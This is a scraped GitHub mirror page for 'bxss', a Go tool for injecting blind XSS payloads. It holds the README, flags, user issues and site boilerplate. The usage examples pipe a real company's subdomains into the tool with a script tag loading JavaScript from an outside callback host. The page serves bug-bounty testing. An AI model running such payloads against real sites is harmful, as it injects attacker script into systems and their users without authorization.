Light

ethicalhackingplayground / bxss Goto Github PK

View Code? Open in Web Editor NEW

201.0 7.0 42.0 5 KB

Go 100.00%

bxss's Introduction

Version 1.0

😎 Bxss 😎

A Blind XSS Injector tool

Features

Inject Blind XSS payloads into custom headers
Inject Blind XSS payloads into parameters
Uses Different Request Methods (PUT,POST,GET,OPTIONS) all at once
Tool Chaining
Really fast
Easy to setup

Install

$ go get -u github.com/ethicalhackingplayground/bxss

Arguments



          ____
         |  _ \
         | |_) |_  _____ ___
         |  _ <\ \/ / __/ __|
         | |_) |>  <\__ \__ \
         |____//_/\_\___/___/


        -- Coded by @z0idsec --
  -appendMode
        Append the payload to the parameter
  -concurrency int
        Set the concurrency (default 30)
  -header string
        Set the custom header (default "User-Agent")
  -parameters
        Test the parameters for blind xss
  -payload string
        the blind XSS payload

Blind XSS In Parameters

$ subfinder uber.com | gau | grep "&" | bxss -appendMode -payload '"><script src=https://hacker.xss.ht></script>' -parameters

Blind XSS In X-Forwarded-For Header

$ subfinder uber.com | gau | bxss -payload '"><script src=https://z0id.xss.ht></script>' -header "X-Forwarded-For"

If you get a bounty please support by buying me a coffee

bxss's People

Contributors

Stargazers

Watchers

bxss's Issues

Great Work

Great work. but i wish if you can add option that allows adding multiple headers not just one.

License?

Respected author, please add a license

Does the tool able to check paramaters and headers in the same time

i wonder if the tool is able to check paramaters and headers in the same time for example using
-appendmode -parameters and -headers in the same time ?

Honestly, I don't think it works

I read your code. it seems you are trying to insert xss payloads into parameters and headers. However you didn't check any response for the potential reflected value.
Maybe you are trying to use xsshunter platform to receive message(as you mentioned, find blinding xss), but the fact is, there's no browser involved in and golang http client will not render javascript and html. In other words, if there are vulnerabilities, you will miss them.
Prove me if I'm wrong.

Suggestion for better result

Edit

Install command do nothing, need help !

I had installed go version go1.15.3 linux/amd64, but go get -u github.com/ethicalhackingplayground/bxss do nothing.
How to install it please ?

Recommend Projects

React

A declarative, efficient, and flexible JavaScript library for building user interfaces.
Vue.js

🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript

TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
TensorFlow

An Open Source Machine Learning Framework for Everyone
Django

The Web framework for perfectionists with deadlines.
Laravel

A PHP framework for web artisans
D3

Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

javascript

JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
web

Some thing interesting about web. New door for the world.
server

A server is a program made to process requests and deliver data to clients.
Machine learning

Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Visualization

Some thing interesting about visualization, use data art
Game

Some thing interesting about game, make everyone happy.

Recommend Org

Facebook

We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft

Open source projects and samples from Microsoft.
Google

Google ❤️ Open Source for everyone.
Alibaba

Alibaba Open Source for everyone
D3

Data-Driven Documents codes.
Tencent

China tencent open source team.

Jobs